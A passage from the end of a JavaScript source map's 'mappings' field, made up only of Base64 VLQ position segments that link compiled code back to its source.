AEH,IAAA,WAAE,EAAC,qCAAqC,EAAE,KAAK,IAAI,EAAE;QACnD,IAAI,CAAC,YAAY;YAAE,OAAO;QAC1B,MAAM,gBAAgB,GAAG,GAAG,CAAC,MAAM,CAAC,EAAE,CAAC,CAAC;QACxC,OAAO,CAAC,GAAG,CAAC,QAAQ,GAAG,MAAM,CAAC;QAC9B,MAAM,IAAA,eAAM,EACV,IAAA,2BAAa,EACX;YACE,QAAQ,EAAE,qBAAqB,SAAS,EAAE;YAC1C,gBAAgB,EAAE,IAAI,EAAE,mDAAmD;YAC3E,uBAAuB,EAAE,gBAAgB;SAC1C,EACD,EAAE,IAAI,EAAE,cAAc,EAAE,CACzB,CACF,CAAC,OAAO,CAAC,OAAO,CAAC,cAAc,CAAC,CAAC;IACpC,CAAC,CAAC,CAAC;IAEH,IAAA,WAAE,EAAC,0CAA0C,EAAE,KAAK,IAAI,EAAE;QACxD,IAAI,CAAC,YAAY;YAAE,OAAO;QAC1B,OAAO,CAAC,GAAG,CAAC,QAAQ,GAAG,MAAM,CAAC;QAC9B,MAAM,CAAC,GAAG,MAAM,IAAA,2BAAa,EAC3B;YACE,QAAQ,EAAE,qBAAqB,SAAS,EAAE;YAC1C,gBAAgB,EAAE,IAAI,EAAE,oDAAoD;YAC5E,uBAAuB,EAAE,cAAc;SACxC,EACD,EAAE,IAAI,EAAE,cAAc,EAAE,CACzB,CAAC;QACF,IAAA,eAAM,EAAC,CAAC,CAAC,UAAU,CAAC,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC;IACjC,CAAC,CAAC,CAAC;IAEH,IAAA,WAAE,EAAC,uCAAuC,EAAE,KAAK,IAAI,EAAE;QACrD,IAAI,CAAC,YAAY;YAAE,OAAO;QAC1B,OAAO,CAAC,GAAG,CAAC,QAAQ,GAAG,MAAM,CAAC;QAC9B,MAAM,IAAA,eAAM,EACV,IAAA,2BAAa,EACX;YACE,QAAQ,EAAE,qBAAqB,SAAS,EAAE;YAC1C,gBAAgB,EAAE,IAAI;YACtB,uBAAuB,EAAE,wBAAwB;SAClD,EACD,EAAE,IAAI,EAAE,cAAc,EAAE,CACzB,CACF,CAAC,OAAO,CAAC,OAAO,CAAC,4BAA4B,CAAC,CAAC;IAClD,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}